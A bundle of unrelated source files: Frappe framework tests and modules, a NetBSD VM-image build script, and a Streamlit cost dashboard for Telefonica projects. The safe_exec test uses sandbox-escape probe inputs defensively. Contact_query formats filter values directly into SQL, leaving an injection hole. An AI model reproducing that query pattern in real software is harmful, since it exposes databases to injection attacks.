# check if auto assigned
todo = frappe.get_list('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
))[0]
todo = frappe.get_doc('ToDo', todo['name'])
self.assertEqual(todo.owner, '<EMAIL>')
note.content="Closed"
note.save()
todo.load_from_db()
# check if todo is closed
self.assertEqual(todo.status, 'Closed')
# check if closed todo retained assignment
self.assertEqual(todo.owner, '<EMAIL>')
def check_multiple_rules(self):
note = make_note(dict(public=1, notify_on_login=1))
# check if auto assigned to test3 (2nd rule is applied, as it has higher priority)
self.assertEqual(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), '<EMAIL>')
def check_assignment_rule_scheduling(self):
frappe.db.sql("DELETE FROM `tabAssignment Rule`")
days_1 = [dict(day = 'Sunday'), dict(day = 'Monday'), dict(day = 'Tuesday')]
days_2 = [dict(day = 'Wednesday'), dict(day = 'Thursday'), dict(day = 'Friday'), dict(day = 'Saturday')]
get_assignment_rule([days_1, days_2], ['public == 1', 'public == 1'])
frappe.flags.assignment_day = "Monday"
note = make_note(dict(public=1))
self.assertIn(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), ['<EMAIL>', '<EMAIL>', '<EMAIL>'])
frappe.flags.assignment_day = "Friday"
note = make_note(dict(public=1))
self.assertIn(frappe.db.get_value('ToDo', dict(
reference_type = 'Note',
reference_name = note.name,
status = 'Open'
), 'owner'), ['<EMAIL>'])
def clear_assignments():
frappe.db.sql("delete from tabToDo where reference_type = 'Note'")
def get_assignment_rule(days, assign=None):
frappe.delete_doc_if_exists('Assignment Rule', 'For Note 1')
if not assign:
assign = ['public == 1', 'notify_on_login == 1']
assignment_rule = frappe.get_doc(dict(
name = 'For Note 1',
doctype = 'Assignment Rule',
priority = 0,
document_type = 'Note',
assign_condition = assign[0],
unassign_condition = 'public == 0 or notify_on_login == 1',
close_condition = '"Closed" in content',
rule = 'Round Robin',
assignment_days = days[0],
users = [
dict(user = '<EMAIL>'),
dict(user = '<EMAIL>'),
dict(user = '<EMAIL>'),
]
)).insert()
frappe.delete_doc_if_exists('Assignment Rule', 'For Note 2')
# 2nd rule
frappe.get_doc(dict(
name = 'For Note 2',
doctype = 'Assignment Rule',
priority = 1,
document_type = 'Note',
assign_condition = assign[1],
unassign_condition = 'notify_on_login == 0',
rule = 'Round Robin',
assignment_days = days[1],
users = [
dict(user = '<EMAIL>')
]
)).insert()
return assignment_rule
def make_note(values=None):
note = frappe.get_doc(dict(
doctype = 'Note',
title = random_string(10),
content = random_string(20)
))
if values:
note.update(values)
note.insert()
return note
```
#### File: doctype/contact/contact.py
```python
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, has_gravatar
from frappe import _
from frappe.model.document import Document
from frappe.core.doctype.dynamic_link.dynamic_link import deduplicate_dynamic_links
from six import iteritems
from past.builtins import cmp
from frappe.model.naming import append_number_if_name_exists
from frappe.contacts.address_and_contact import set_link_title
import functools
class Contact(Document):
def autoname(self):
# concat first and last name
self.name = " ".join(filter(None,
[cstr(self.get(f)).strip() for f in ["first_name", "last_name"]]))
if frappe.db.exists("Contact", self.name):
self.name = append_number_if_name_exists('Contact', self.name)
# concat party name if reqd
for link in self.links:
self.name = self.name + '-' + link.link_name.strip()
break
def validate(self):
self.set_primary_email()
self.set_primary("phone")
self.set_primary("mobile_no")
self.set_user()
set_link_title(self)
if self.email_id and not self.image:
self.image = has_gravatar(self.email_id)
if self.get("sync_with_google_contacts") and not self.get("google_contacts"):
frappe.throw(_("Select Google Contacts to which contact should be synced."))
deduplicate_dynamic_links(self)
def set_user(self):
if not self.user and self.email_id:
self.user = frappe.db.get_value("User", {"email": self.email_id})
def get_link_for(self, link_doctype):
'''Return the link name, if exists for the given link DocType'''
for link in self.links:
if link.link_doctype==link_doctype:
return link.link_name
return None
def has_link(self, doctype, name):
for link in self.links:
if link.link_doctype==doctype and link.link_name== name:
return True
def has_common_link(self, doc):
reference_links = [(link.link_doctype, link.link_name) for link in doc.links]
for link in self.links:
if (link.link_doctype, link.link_name) in reference_links:
return True
def add_email(self, email_id, is_primary=0, autosave=False):
self.append("email_ids", {
"email_id": email_id,
"is_primary": is_primary
})
if autosave:
self.save(ignore_permissions=True)
def add_phone(self, phone, is_primary_phone=0, is_primary_mobile_no=0, autosave=False):
self.append("phone_nos", {
"phone": phone,
"is_primary_phone": is_primary_phone,
"is_primary_mobile_no": is_primary_mobile_no
})
if autosave:
self.save(ignore_permissions=True)
def set_primary_email(self):
if not self.email_ids:
self.email_id = ""
return
if len([email.email_id for email in self.email_ids if email.is_primary]) > 1:
frappe.throw(_("Only one {0} can be set as primary.").format(frappe.bold("Email ID")))
for d in self.email_ids:
if d.is_primary == 1:
self.email_id = d.email_id.strip()
break
def set_primary(self, fieldname):
# Used to set primary mobile and phone no.
if len(self.phone_nos) == 0:
setattr(self, fieldname, "")
return
field_name = "is_primary_" + fieldname
is_primary = [phone.phone for phone in self.phone_nos if phone.get(field_name)]
if len(is_primary) > 1:
frappe.throw(_("Only one {0} can be set as primary.").format(frappe.bold(frappe.unscrub(fieldname))))
for d in self.phone_nos:
if d.get(field_name) == 1:
setattr(self, fieldname, d.phone)
break
def get_default_contact(doctype, name):
'''Returns default contact for the given doctype, name'''
out = frappe.db.sql('''select parent,
(select is_primary_contact from tabContact c where c.name = dl.parent)
as is_primary_contact
from
`tabDynamic Link` dl
where
dl.link_doctype=%s and
dl.link_name=%s and
dl.parenttype = "Contact"''', (doctype, name))
if out:
return sorted(out, key = functools.cmp_to_key(lambda x,y: cmp(y[1], x[1])))[0][0]
else:
return None
@frappe.whitelist()
def invite_user(contact):
contact = frappe.get_doc("Contact", contact)
if not contact.email_id:
frappe.throw(_("Please set Email Address"))
if contact.has_permission("write"):
user = frappe.get_doc({
"doctype": "User",
"first_name": contact.first_name,
"last_name": contact.last_name,
"email": contact.email_id,
"user_type": "Website User",
"send_welcome_email": 1
}).insert(ignore_permissions = True)
return user.name
@frappe.whitelist()
def get_contact_details(contact):
contact = frappe.get_doc("Contact", contact)
out = {
"contact_person": contact.get("name"),
"contact_display": " ".join(filter(None,
[contact.get("salutation"), contact.get("first_name"), contact.get("last_name")])),
"contact_email": contact.get("email_id"),
"contact_mobile": contact.get("mobile_no"),
"contact_phone": contact.get("phone"),
"contact_designation": contact.get("designation"),
"contact_department": contact.get("department")
}
return out
def update_contact(doc, method):
'''Update contact when user is updated, if contact is found. Called via hooks'''
contact_name = frappe.db.get_value("Contact", {"email_id": doc.name})
if contact_name:
contact = frappe.get_doc("Contact", contact_name)
for key in ("first_name", "last_name", "phone"):
if doc.get(key):
contact.set(key, doc.get(key))
contact.flags.ignore_mandatory = True
contact.save(ignore_permissions=True)
def contact_query(doctype, txt, searchfield, start, page_len, filters):
from frappe.desk.reportview import get_match_cond
link_doctype = filters.pop('link_doctype')
link_name = filters.pop('link_name')
condition = ""
for fieldname, value in iteritems(filters):
condition += " and {field}={value}".format(
field=fieldname,
value=value
)
return frappe.db.sql("""select
`tabContact`.name, `tabContact`.first_name, `tabContact`.last_name
from
`tabContact`, `tabDynamic Link`
where
`tabDynamic Link`.parent = `tabContact`.name and
`tabDynamic Link`.parenttype = 'Contact' and
`tabDynamic Link`.link_doctype = %(link_doctype)s and
`tabDynamic Link`.link_name = %(link_name)s and
`tabContact`.`{key}` like %(txt)s
{mcond}
order by
if(locate(%(_txt)s, `tabContact`.name), locate(%(_txt)s, `tabContact`.name), 99999),
`tabContact`.idx desc, `tabContact`.name
limit %(start)s, %(page_len)s """.format(
mcond=get_match_cond(doctype),
key=searchfield), {
'txt': '%' + txt + '%',
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len,
'link_name': link_name,
'link_doctype': link_doctype
})
@frappe.whitelist()
def address_query(links):
import json
links = [{"link_doctype": d.get("link_doctype"), "link_name": d.get("link_name")} for d in json.loads(links)]
result = []
for link in links:
if not frappe.has_permission(doctype=link.get("link_doctype"), ptype="read", doc=link.get("link_name")):
continue
res = frappe.db.sql("""
SELECT `tabAddress`.name
FROM `tabAddress`, `tabDynamic Link`
WHERE `tabDynamic Link`.parenttype='Address'
AND `tabDynamic Link`.parent=`tabAddress`.name
AND `tabDynamic Link`.link_doctype = %(link_doctype)s
AND `tabDynamic Link`.link_name = %(link_name)s
""", {
"link_doctype": link.get("link_doctype"),
"link_name": link.get("link_name"),
}, as_dict=True)
result.extend([l.name for l in res])
return result
def get_contact_with_phone_number(number):
if not number: return
contacts = frappe.get_all('Contact Phone', filters=[
['phone', 'like', '%{0}'.format(number)]
], fields=["parent"], limit=1)
return contacts[0].parent if contacts else None
def get_contact_name(email_id):
contact = frappe.get_list("Contact Email", filters={"email_id": email_id}, fields=["parent"], limit=1)
return contact[0].parent if contact else None
```
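The whitelisted helpers at the end of this module are normally hit over frappe's RPC layer, but they can also be called from a bench console. A hedged sketch, assuming an initialised site and an existing contact; the site name and email below are hypothetical:

```python
# Sketch only: requires a frappe bench environment and an existing site.
import frappe
from frappe.contacts.doctype.contact.contact import get_contact_name, get_contact_details

frappe.init(site="mysite.local")                 # hypothetical site name
frappe.connect()
contact = get_contact_name("jane@example.com")   # hypothetical contact email
if contact:
    print(get_contact_details(contact))
```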
#### File: doctype/role/role.py
```python
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Role(Document):
def before_rename(self, old, new, merge=False):
if old in ("Guest", "Administrator", "System Manager", "All"):
frappe.throw(frappe._("Standard roles cannot be renamed"))
def after_insert(self):
frappe.cache().hdel('roles', 'Administrator')
def validate(self):
if self.disabled:
if self.name in ("Guest", "Administrator", "System Manager", "All"):
frappe.throw(frappe._("Standard roles cannot be disabled"))
else:
frappe.db.sql("delete from `tabHas Role` where role = %s", self.name)
frappe.clear_cache()
# Get email addresses of all users that have been assigned this role
def get_emails_from_role(role):
emails = []
users = frappe.get_list("Has Role", filters={"role": role, "parenttype": "User"},
fields=["parent"])
for user in users:
user_email, enabled = frappe.db.get_value("User", user.parent, ["email", "enabled"])
if enabled and user_email not in ["<EMAIL>", "<EMAIL>"]:
emails.append(user_email)
return emails
```
#### File: frappe/tests/test_safe_exec.py
```python
from __future__ import unicode_literals
import unittest
from frappe.utils.safe_exec import safe_exec
class TestSafeExec(unittest.TestCase):
def test_import_fails(self):
self.assertRaises(ImportError, safe_exec, 'import os')
def test_internal_attributes(self):
self.assertRaises(SyntaxError, safe_exec, '().__class__.__call__')
```
#### File: frappe/utils/jinja.py
```python
from __future__ import unicode_literals
def get_jenv():
import frappe
from frappe.utils.safe_exec import get_safe_globals
if not getattr(frappe.local, 'jenv', None):
from jinja2 import DebugUndefined
from jinja2.sandbox import SandboxedEnvironment
# frappe will be loaded last, so app templates will get precedence
jenv = SandboxedEnvironment(loader = get_jloader(),
undefined=DebugUndefined)
set_filters(jenv)
jenv.globals.update(get_safe_globals())
jenv.globals.update(get_jenv_customization('methods'))
frappe.local.jenv = jenv
return frappe.local.jenv
def get_template(path):
return get_jenv().get_template(path)
def get_email_from_template(name, args):
from jinja2 import TemplateNotFound
args = args or {}
try:
message = get_template('templates/emails/' + name + '.html').render(args)
except TemplateNotFound as e:
raise e
try:
text_content = get_template('templates/emails/' + name + '.txt').render(args)
except TemplateNotFound:
text_content = None
return (message, text_content)
def validate_template(html):
"""Throws exception if there is a syntax error in the Jinja Template"""
import frappe
from jinja2 import TemplateSyntaxError
jenv = get_jenv()
try:
jenv.from_string(html)
except TemplateSyntaxError as e:
frappe.msgprint('Line {}: {}'.format(e.lineno, e.message))
frappe.throw(frappe._("Syntax error in template"))
def render_template(template, context, is_path=None, safe_render=True):
'''Render a template using Jinja
:param template: path or HTML containing the jinja template
:param context: dict of properties to pass to the template
:param is_path: (optional) assert that the `template` parameter is a path
:param safe_render: (optional) prevent server side scripting via jinja templating
'''
from frappe import get_traceback, throw
from jinja2 import TemplateError
if not template:
return ""
# if it ends with .html then it's a freaking path, not html
if (is_path
or template.startswith("templates/")
or (template.endswith('.html') and '\n' not in template)):
return get_jenv().get_template(template).render(context)
else:
if safe_render and ".__" in template:
throw("Illegal template")
try:
return get_jenv().from_string(template).render(context)
except TemplateError:
throw(title="Jinja Template Error", msg="<pre>{template}</pre><pre>{tb}</pre>".format(template=template, tb=get_traceback()))
def get_jloader():
import frappe
if not getattr(frappe.local, 'jloader', None):
from jinja2 import ChoiceLoader, PackageLoader, PrefixLoader
if frappe.local.flags.in_setup_help:
apps = ['frappe']
else:
apps = frappe.get_hooks('template_apps')
if not apps:
apps = frappe.local.flags.web_pages_apps or frappe.get_installed_apps(sort=True)
apps.reverse()
if not "frappe" in apps:
apps.append('frappe')
frappe.local.jloader = ChoiceLoader(
# search for something like app/templates/...
[PrefixLoader(dict(
(app, PackageLoader(app, ".")) for app in apps
))]
# search for something like templates/...
+ [PackageLoader(app, ".") for app in apps]
)
return frappe.local.jloader
def set_filters(jenv):
import frappe
from frappe.utils import global_date_format, cint, cstr, flt, markdown
from frappe.website.utils import get_shade, abs_url
jenv.filters["global_date_format"] = global_date_format
jenv.filters["markdown"] = markdown
jenv.filters["json"] = frappe.as_json
jenv.filters["get_shade"] = get_shade
jenv.filters["len"] = len
jenv.filters["int"] = cint
jenv.filters["str"] = cstr
jenv.filters["flt"] = flt
jenv.filters["abs_url"] = abs_url
if frappe.flags.in_setup_help:
return
jenv.filters.update(get_jenv_customization('filters'))
def get_jenv_customization(customization_type):
'''Returns a dict with filter/method name as key and definition as value'''
import frappe
out = {}
if not getattr(frappe.local, "site", None):
return out
values = frappe.get_hooks("jenv", {}).get(customization_type)
if not values:
return out
for value in values:
fn_name, fn_string = value.split(":")
out[fn_name] = frappe.get_attr(fn_string)
return out
``` |
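`render_template` decides between loading a file and rendering an inline string based on the shape of the template argument. A short illustrative snippet (it assumes a frappe site context, e.g. a `bench console`, so hooks and the template loader resolve):

```python
from frappe.utils.jinja import validate_template, render_template

validate_template("Hello {{ name }}")                           # raises on Jinja syntax errors
print(render_template("Hello {{ name }}", {"name": "World"}))   # inline string -> "Hello World"
# Anything ending in .html or starting with "templates/" is treated as a path, e.g.
# render_template("templates/emails/some_template.html", context)  # hypothetical path
```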
{
"source": "jimmyrincon/netbsd-gce",
"score": 2
} |
#### File: jimmyrincon/netbsd-gce/mkvm.py
```python
import anita
import ftplib
import sys
def find_latest_release(branch, arch):
"""Find the latest NetBSD release on the given branch for the given arch.
Returns:
the full path to the release.
"""
conn = ftplib.FTP('nyftp.netbsd.org')
conn.login()
conn.cwd('/pub/NetBSD-daily/%s' % branch)
releases = conn.nlst()
releases.sort(reverse=True)
for r in releases:
archs = conn.nlst(r)
if not archs:
continue
has_arch = [a for a in archs if a.endswith(arch)]
if has_arch:
return "https://nycdn.netbsd.org/pub/NetBSD-daily/%s/%s/" % (branch, has_arch[0])
arch = sys.argv[1]
branch = sys.argv[2]
commands = [
"""cat > /etc/ifconfig.vioif0 << EOF
!dhcpcd vioif0
mtu 1460
EOF""",
"dhcpcd",
"""ed /etc/fstab << EOF
H
%s/wd0/sd0/
wq
EOF""",
"sync; shutdown -hp now",
]
a = anita.Anita(
anita.URL(find_latest_release(branch, arch)),
workdir="work-%s-%s" % (branch, arch),
disk_size="4G",
memory_size = "1G",
persist=True)
child = a.boot()
anita.login(child)
for cmd in commands:
anita.shell_cmd(child, cmd, 1200)
# Sometimes, the halt command times out, even though it has completed
# successfully.
try:
a.halt()
except:
pass
``` |
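`find_latest_release` only walks the public daily-build FTP tree, so it can be tried on its own. An illustrative call (it assumes the function and the imports at the top of the script are available in the current namespace, and needs outbound FTP access):

```python
url = find_latest_release("HEAD", "amd64")
print(url)  # e.g. https://nycdn.netbsd.org/pub/NetBSD-daily/HEAD/<build>/amd64/
```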
{
"source": "jimmys29/Plex",
"score": 2
} |
#### File: jimmys29/Plex/plex.py
```python
import streamlit as st
# EDA Pkgs
import pandas as pd
import codecs
import plotly.express as px
import altair as alt
from PIL import Image
# Components Pkgs
import streamlit.components.v1 as components
# Custome Component Fxn
import sweetviz as sv
st.set_page_config(
page_title="DASHBOARD PLEX",
page_icon="https://www.telefonica.com/documents/20195/146013668/telefonica-logo-azul.png/03c9a0c0-57eb-eb53-5649-79e382fd4965?t=1618483185177",
layout="wide",
initial_sidebar_state="expanded")
image = Image.open('TelefonicaL.jpg')
# rutimage = ""<img src="https://www.w3schools.com/howto/img_nature_wide.jpg" style="width:100%">""
# image= st.image("<img src=rutimage; style="width:100%">")
img = st.sidebar.image(image)
def st_display_sweetviz(report_html, width=1000, height=500):
report_file = codecs.open(report_html, 'r')
page = report_file.read()
components.html(page, width=width, height=height, scrolling=True)
footer_temp = """
<!-- CSS -->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css" type="text/css" rel="stylesheet" media="screen,projection"/>
<link href="static/css/style.css" type="text/css" rel="stylesheet" media="screen,projection"/>
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="<KEY>" crossorigin="anonymous">
<footer class="page-footer grey darken-4">
<div class="container" id="aboutapp">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Causacion Telefonica PlEx App</h5>
<p class="grey-text text-lighten-4">Using Streamlit.</p>
</div>
<div class="col l3 s12">
<h5 class="white-text">Connect With Me</h5>
<ul>
<a href="https://www.telefonica.com/documents/20195/146016182/facebook-icon.png/752bd9ce-a2cf-8ccf-c906-ae9172935ea4?t=1619084036934">
<i class="fab fa-facebook fa-4x"></i>
</a>
<a href="https://www.linkedin.com/in/jaime-espindola-a5833447/" target="_blank" class="white-text">
<i class="fab fa-linkedin fa-4x"></i>
</a>
<a href="https://www.telefonica.com/documents/20195/146016182/youtube-icon.png/8dd29ebe-b03d-dd41-7ccc-a30b51f95b76?t=1619084037794" target="_blank" class="white-text">
<i class="fab fa-youtube-square fa-4x"></i>
</a>
<a href="https://www.telefonica.com/documents/20195/146016182/instagram-icon.png/51b9aca8-3e54-fe2e-4946-bed8501584b9?t=1619084037303" target="_blank" class="white-text">
<i class="fab fa-github-square fa-4x"></i>
</a>
</ul>
</div>
</div>
</div>
<div class="footer-copyright">
<div class="container">
Made by, <a class="white-text text-lighten-3" href="https://www.telefonica.com/es/home"> <NAME></a><br/>
<a class="white-text text-lighten-3" href="https://www.telefonica.com/es/home">@<NAME></a>
</div>
</div>
</footer>
"""
html_temp = """
<div style="background-color:royalblue;padding:1px;border-radius:1px">
<h1 style="color:white;text-align:center;">DashBoard Causacion PlEx</h1>
</div>
"""
# T1 = st.title("<h1 style='text-align: center;background:royalblue; color: white;'>Dash Board Causacion PlEx</h1>", "Dash")
def archivo():
st.sidebar.title("Seleccione Archivo DashBoard")
data_file = st.sidebar.file_uploader(" ", type=['xlsx'])
return data_file
def main():
"""DASH BOARD TELEFONICA PLEX"""
st.sidebar.title("<h4 style='text-align: right ;font-size=50; color: red;'>Seleccione archivo Origen</h4>", "File")
data_file = st.sidebar.file_uploader(" ", type=['xlsx'])
menu = ["Home", "Jefatura", "Anillo Antioquia", "Ftth", "Transformacion IP", "Banagrario", "About"]
choice = st.sidebar.selectbox("Menu Proyectos", menu)
st.title("<h4 style='text-align: right ;font-size=50; color: darkblue;'>Choose Project from Menu</h4>", "File")
# OPCIONES A GRAFICAR
tile_x = st.sidebar.selectbox(label="Seleccione Opcion Eje_X",
options=["PROYECTO", "SITIO", "GESTOR", "REGIONAL", "ID_PTO", "MES"],
index=0)
opcion = st.sidebar.radio("Seleccione Opcion Eje_Y", ["COSTO", "CANTIDAD"])
if not opcion:
st.error("Por favor seleccione Una Opcion")
def op( ):
if opcion == "COSTO":
opt = 'TOTAL'
elif opcion == "CANTIDAD":
opt = 'CANTIDAD'
return opt
tile_y = op()
tile_col = st.sidebar.radio("Seleccione Opcion Color", ["GRUPO", "CONTRATO", "EQUIPO", "PROYECTO"])
if data_file is not None:
dfup = pd.read_excel(data_file)
# dfup = dfap[dfap['GRUPO'].dropna()]
if choice == "Jefatura":
st.subheader("Jefatura")
# Selection para interaccion
selector = alt.selection(type="single", empty='none')
# Grafico General
if st.checkbox('Ver Grafica Consolidado', menu):
# st.line_chart(dfup) # mostrar barra lateral
Graf_Jef = alt.Chart(dfup).mark_boxplot(size=50, extent=3.0) \
.encode(x=alt.X(tile_x, title=tile_x),
y=alt.Y(tile_y, title=tile_y), color=tile_col, size='TIPO',
tooltip=['TIPO', 'TIPO', 'TOTAL', tile_y]).add_selection(
selector).interactive().properties(width=500, height=300)
fig = px.histogram(dfup, x=tile_x, y=tile_y, color=tile_col,
hover_data=['TIPO', 'ID_PTO', 'GESTOR'], labels={'TOTAL': 'TOTAL CAUSADO'})
st.plotly_chart(fig)
# Graf_Jef
text = Graf_Jef.mark_text(align='left', baseline='middle', dx=3, font="Courier",
fontSize=1).encode(text='TOTAL', size=alt.value(7))
# fig = fig.add_trace(go.Funnel( dfup , x=tile_x , y=tile_y , color=tile_col ,
# labels={'TOTAL': 'TOTAL CAUSADO'} )
# st.plotly_chart ( fig )
if st.checkbox('Mostrar Tabla de Datos'):
st.write(dfup)
if st.button("Generate Report"):
# Normal Workflow
report = sv.analyze(dfup)
report.show_html()
st_display_sweetviz("SWEETVIZ_REPORT.html")
if choice == "Anillo Antioquia":
st.subheader("Anillo Antioquia")
dfpr = dfup[(dfup['PROYECTO'] == 'ANILLO ANTIOQUIA')]
tot = dfup.groupby(['PROYECTO'])['PROYECTO', 'TOTAL'].sum()
# Tot = dfup [ 'TOTAL' ].apply ( np.sum )
# Selection para interaccion
selector = alt.selection(type="single", empty='none')
multi = alt.selection_multi()
# Grafico General
if st.checkbox('Ver Grafica Proyecto Anillo Antioquia', menu):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart(dfpr).mark_bar(size=500 , cornerRadiusTopLeft=20) \
.encode ( x=alt.X(tile_x, title=tile_x),
y=alt.Y(tile_y, title=tile_y), color=tile_col, size='TIPO',
tooltip=['TIPO', 'TIPO', 'TOTAL', tile_y]) \
.add_selection(selector).interactive()
# Graf_otr = alt.Chart ( dfpr ).transform_joinaggregate (TotalTOTAL='sum(TOTAL)' ,).transform_calculate(PercentOfTotal="datum.TOTAL / datum.TotalTOTAL").mark_bar().encode(alt.X('PercentOfTotal:Q', axis=alt.Axis(format='.0%')),y='GRUPO:N', color=tile_col)
fig = px.histogram(dfpr, x=tile_x, y=tile_y, color=tile_col,
hover_data=['TIPO', 'ID_PTO', 'GESTOR'], labels={'TOTAL': 'TOTAL CAUSADO'})
st.plotly_chart(fig)
text = Graf_Proy.mark_text(align='left', baseline='middle', dy=.1, font="Courier", fontSize=1,
angle=270).encode(text='TOTAL', size=alt.value(7))
# Graf_Proy
if st.checkbox('Mostrar Tabla de Datos'):
st.write(dfpr)
if st.button("Generate Report"):
# Normal Workflow
report = sv.analyze(dfpr)
report.show_html()
st_display_sweetviz("SWEETVIZ_REPORT.html")
dfup = pd.read_excel ( data_file )
if choice == "Transformacion IP":
st.subheader ( "Transformacion IP" )
dfpr = dfup [ (dfup [ 'PROYECTO' ] == 'TRANSFORMACION IP') ]
# Selection para interaccion
selector = alt.selection ( type="single" , empty='none' )
# Grafico General
if st.checkbox ( 'Ver Grafica Proyecto' , menu ):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart ( dfpr ).mark_bar ( size=50 ) \
.encode ( x=alt.X ( tile_x , title=tile_x ) ,
y=alt.Y ( tile_y , title=tile_y ) , color=tile_col , size='TIPO' ,
tooltip=[ 'TIPO' , 'TIPO' , 'TOTAL' , tile_y ] ) \
.add_selection ( selector ).interactive ()
fig = px.histogram ( dfpr , x=tile_x , y=tile_y , color=tile_col , )
st.plotly_chart ( fig )
st.write ( Graf_Proy )
if st.checkbox ( 'Mostrar Tabla de Datos' ):
st.write ( dfpr )
if st.button ( "Generate Report" ):
# Normal Workflow
report = sv.analyze ( dfpr )
report.show_html ()
st_display_sweetviz ( "SWEETVIZ_REPORT.html" )
if choice == "Ftth":
st.subheader ( "Ftth" )
dfpr = dfup [ (dfup [ 'PROYECTO' ] == 'FTTH') ]
# Selection para interaccion
selector = alt.selection ( type="single" , empty='none' )
# Grafico General
if st.checkbox ( 'Ver Grafica Proyecto' , menu ):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart ( dfpr ).mark_bar ( size=50 ) \
.encode ( x=alt.X ( tile_x , title=tile_x ) ,
y=alt.Y ( tile_y , title=tile_y ) , color=tile_col , size='TIPO' ,
tooltip=[ 'TIPO' , 'TIPO' , 'TOTAL' , tile_y ] ) \
.add_selection ( selector ).interactive ()
fig = px.histogram ( dfpr , x=tile_x , y=tile_y , color=tile_col ,
hover_data=[ 'TIPO' , 'ID_PTO' , 'GESTOR' ] , labels={'TOTAL': 'TOTAL CAUSADO'} )
st.plotly_chart ( fig )
# Graf_Proy
if st.checkbox ( 'Mostrar Tabla de Datos' ):
st.write ( dfpr )
if st.button ( "Generate Report" ):
# Normal Workflow
report = sv.analyze ( dfpr )
report.show_html ()
st_display_sweetviz ( "SWEETVIZ_REPORT.html" )
if choice == "Banagrario":
st.subheader ( "Banagrario" )
dfpr = dfup [ (dfup [ 'PROYECTO' ] == 'BANAGRARIO') ]
# Selection para interaccion
selector = alt.selection ( type="single" , empty='none' )
# Grafico General
if st.checkbox ( 'Ver Grafica Proyecto' , menu ):
# st.line_chart(data()) # mostrar barra lateral
Graf_Proy = alt.Chart ( dfpr ).mark_bar ( size=50 ) \
.encode ( x=alt.X ( tile_x , title=tile_x ) ,
y=alt.Y ( tile_y , title=tile_y ) , color=tile_col , size='TIPO' ,
tooltip=[ 'TIPO' , 'TIPO' , 'TOTAL' , tile_y ] ) \
.add_selection ( selector ).interactive ()
fig = px.histogram ( dfpr , x=tile_x , y=tile_y , color=tile_col ,
hover_data=[ 'TIPO' , 'ID_PTO' , 'GESTOR' ] , labels={'TOTAL': 'TOTAL CAUSADO'} )
st.plotly_chart ( fig )
# Graf_Proy
if st.checkbox ( 'Mostrar Tabla de Datos' ):
st.write ( dfpr )
if st.button ( "Generate Report" ):
# Normal Workflow
report = sv.analyze ( dfpr )
report.show_html ()
st_display_sweetviz ( "SWEETVIZ_REPORT.html" )
elif choice == "About":
st.subheader ( "About DashBoard" )
# components.iframe('https://telefonica.com')
components.html ( footer_temp , height=500 )
else:
st.subheader ( "Home" )
# components.html("<p style='color:red;'> Streamlit Components is Awesome</p>")
components.html ( html_temp )
components.html ( """
<style>
* {box-sizing: border-box}
body {font-family: Verdana, sans-serif; margin:0}
.mySlides {display: none}
img {vertical-align: middle;}
/* Slideshow container */
.slideshow-container {
max-width: 1000px;
position: relative;
margin: auto;
}
/* Next & previous buttons */
.prev, .next {
cursor: pointer;
position: absolute;
top: 50%;
width: auto;
padding: 16px;
margin-top: -22px;
color: white;
font-weight: bold;
font-size: 18px;
transition: 0.6s ease;
border-radius: 0 3px 3px 0;
user-select: none;
}
/* Position the "next button" to the right */
.next {
right: 0;
border-radius: 3px 0 0 3px;
}
/* On hover, add a black background color with a little bit see-through */
.prev:hover, .next:hover {
background-color: rgba(0,0,0,0.8);
}
/* Caption text */
.text {
color: #f2f2f2;
font-size: 15px;
padding: 8px 12px;
position: absolute;
bottom: 8px;
width: 100%;
text-align: center;
}
/* Number text (1/3 etc) */
.numbertext {
color: #f2f2f2;
font-size: 12px;
padding: 8px 12px;
position: absolute;
top: 0;
}
/* The dots/bullets/indicators */
.dot {
cursor: pointer;
height: 15px;
width: 15px;
margin: 0 2px;
background-color: #bbb;
border-radius: 50%;
display: inline-block;
transition: background-color 0.6s ease;
}
.active, .dot:hover {
background-color: #717171;
}
/* Fading animation */
.fade {
-webkit-animation-name: fade;
-webkit-animation-duration: 1.5s;
animation-name: fade;
animation-duration: 1.5s;
}
@-webkit-keyframes fade {
from {opacity: .4}
to {opacity: 1}
}
@keyframes fade {
from {opacity: .4}
to {opacity: 1}
}
/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
.prev, .next,.text {font-size: 11px}
}
</style>
</head>
<body>
<div class="slideshow-container">
<div class="mySlides fade">
<div class="numbertext">1 / 5</div>
<img src="https://www.w3schools.com/howto/img_5terre_wide.jpg" style="width:100%">
<div class="text">Caption Text</div>
</div>
<div class="mySlides fade">
<div class="numbertext">2 / 5</div>
<img src="https://www.w3schools.com/howto/img_nature_wide.jpg" style="width:100%">
<div class="text">Caption Text</div>
</div>
<div class="mySlides fade">
<div class="numbertext">3 / 5</div>
<img src="https://www.w3schools.com/howto/img_snow_wide.jpg" style="width:100%">
<div class="text">Caption Two</div>
</div>
<div class="mySlides fade">
<div class="numbertext">4 / 5</div>
<img src="https://www.w3schools.com/howto/img_mountains_wide.jpg" style="width:100%">
<div class="text">Caption Three</div>
</div>
<div class="mySlides fade">
<div class="numbertext">5 / 5</div>
<img src="https://www.w3schools.com/howto/img_lights_wide.jpg" style="width:100%">
<div class="text">Caption Three</div>
</div>
<a class="prev" onclick="plusSlides(-1)">❮</a>
<a class="next" onclick="plusSlides(1)">❯</a>
</div>
<br>
<div style="text-align:center">
<span class="dot" onclick="currentSlide(1)"></span>
<span class="dot" onclick="currentSlide(2)"></span>
<span class="dot" onclick="currentSlide(3)"></span>
</div>
<script>
var slideIndex = 1;
showSlides(slideIndex);
function plusSlides(n) {
showSlides(slideIndex += n);
}
function currentSlide(n) {
showSlides(slideIndex = n);
}
function showSlides(n) {
var i;
var slides = document.getElementsByClassName("mySlides");
var dots = document.getElementsByClassName("dot");
if (n > slides.length) {slideIndex = 1}
if (n < 1) {slideIndex = slides.length}
for (i = 0; i < slides.length; i++) {
slides[i].style.display = "none";
}
